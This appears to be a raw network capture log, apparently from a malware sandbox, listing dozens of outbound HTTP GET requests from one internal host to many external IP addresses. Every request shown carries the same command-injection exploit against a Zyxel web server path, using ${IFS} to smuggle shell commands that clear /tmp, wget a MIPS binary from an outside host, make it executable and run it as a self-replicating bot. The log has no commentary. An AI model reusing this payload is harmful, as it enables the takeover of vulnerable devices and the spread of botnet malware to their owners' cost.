                                      Jan 14, 2024 15:50:48.345125914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4773192.168.2.1441640203.113.104.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345185995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4774192.168.2.14506045.251.172.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345233917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4775192.168.2.14397841.38.118.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345298052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4776192.168.2.144375063.174.4.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345331907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4777192.168.2.144456650.56.206.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345392942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4778192.168.2.1448828179.182.233.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345463991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4779192.168.2.1451428188.23.8.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345499039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4780192.168.2.146029897.223.126.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345583916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4781192.168.2.144015831.146.22.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345608950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4782192.168.2.144273888.156.67.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345679045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4783192.168.2.144338013.47.179.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345752001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4784192.168.2.14457725.182.108.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345783949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4785192.168.2.1432984177.36.96.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345841885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4786192.168.2.145972419.194.9.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345921040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4787192.168.2.1452890111.58.178.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.345948935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4788192.168.2.144046025.51.142.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346035004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4789192.168.2.1440062171.63.221.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346101046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4790192.168.2.144001891.82.105.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346143007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4791192.168.2.146079431.231.23.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346215010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4792192.168.2.143740095.233.246.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346270084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4793192.168.2.145086696.53.76.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346343994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4794192.168.2.1447632115.33.124.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346401930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4795192.168.2.1438508174.149.242.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346447945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4796192.168.2.1433210162.40.110.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346503973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4797192.168.2.1449762142.94.12.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346553087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4798192.168.2.1458510162.74.198.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346630096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4799192.168.2.143944050.177.29.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346673965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4800192.168.2.143575827.194.108.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346721888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4801192.168.2.145519894.247.72.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346779108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4802192.168.2.1438774151.95.242.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346844912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4803192.168.2.1457350151.228.66.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346884012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4804192.168.2.146032262.163.38.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346930981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4805192.168.2.1446000193.129.80.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.346967936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4806192.168.2.1434578183.46.118.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347021103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4807192.168.2.1453944187.243.172.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347080946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4808192.168.2.144617013.233.89.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347141027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4809192.168.2.1448050126.135.162.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347197056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4810192.168.2.1455988175.73.202.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347237110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4811192.168.2.146080466.233.106.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347286940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4812192.168.2.1439634112.206.82.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347369909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4813192.168.2.1459178199.129.25.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347440004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4814192.168.2.145909239.190.116.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347507000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4815192.168.2.1452882199.71.6.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347554922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4816192.168.2.143986861.56.133.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347616911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4817192.168.2.144581868.145.228.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347666025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4818192.168.2.1441744223.191.65.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347688913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4819192.168.2.144445897.205.186.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347737074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4820192.168.2.1451620210.138.122.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347800970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4821192.168.2.144703257.133.132.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347856045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4822192.168.2.144164065.100.19.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347908974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4823192.168.2.1454698163.138.171.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.347970963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4824192.168.2.1447496154.82.85.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348015070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4825192.168.2.144421647.11.105.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348100901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4826192.168.2.1455010111.116.56.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348146915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4827192.168.2.1440020185.107.92.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348181963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4828192.168.2.144637275.52.248.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348237991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4829192.168.2.144660087.230.189.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348305941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4830192.168.2.1451436141.23.178.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348354101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4831192.168.2.145870287.226.79.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348418951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4832192.168.2.144978872.127.205.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348480940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4833192.168.2.1435150166.107.158.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348540068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4834192.168.2.1441556154.246.58.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348596096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4835192.168.2.14528884.185.106.142443
                                      TimestampBytes transferredDirectionData
